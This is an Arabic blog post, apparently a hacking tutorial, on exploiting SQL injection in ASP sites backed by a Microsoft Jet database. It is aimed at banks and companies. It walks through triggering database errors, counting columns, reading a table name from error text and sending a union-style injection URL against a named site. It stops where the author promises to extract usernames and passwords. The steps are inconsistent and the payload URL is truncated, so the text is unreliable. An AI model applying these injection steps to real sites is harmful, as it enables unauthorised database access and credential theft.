السلام
عليكم ورحمة الله وبركاته
اليوم وبعد انقطاع عن المواضيع .. قررت اعمل لكم شرح عن
استغلال ثغرات asp ..
هذه البرمجة نادرة الاستخدام الا فى المواقع الكبيرة مثل
البنوك والشركات ..
ساشرح لكم كيفية استغلال خطأ sql تابع
معى ..
المنطقة المصابة بثغرة sql نضع
بعد الرابط وبعد المتغير علامة " او '
يظهر لنا الخطأ التالى :
كود PHP:
Microsoft
JET Database Engine error ’80040e14’
Syntax
error in string in query expression ’id = 10";’.
/baskabirbolum.asp,
line 7
الان نبدا نعد بالاعمدة للوصول الى العمود المطلوب
الان عند الوصول الى العمود المصاب وهو 10
يظهر الخطأ التالى :
كود PHP:
Microsoft
JET Database Engine error ’80040e14’
The
Microsoft Jet database engine does not recognize ’10’ as a valid field name or
expression.
/news.asp,
line 7
ويكون العمود المصاب الرقم 8
الان عند الوصول الى الرقم 7 يظهر لنا هذا الخطا وبداخله
اسم القاعدة
كود PHP:
Microsoft
JET Database Engine error ’80040e37’
The
Microsoft Jet database engine cannot find the input table or query ’hayber’.
Make sure it exists and that its name is spelled correctly.
/baskabirbolum.asp,
line 7
واسمها : hayber
ويتم استغلالها .
http://www.haybersqlogretiyo.com/bas...+0,1,2,3,4,5,6,
7+from+hayber
والان نظهر اسم اليوزر والباس






0 commentaires:
Enregistrer un commentaire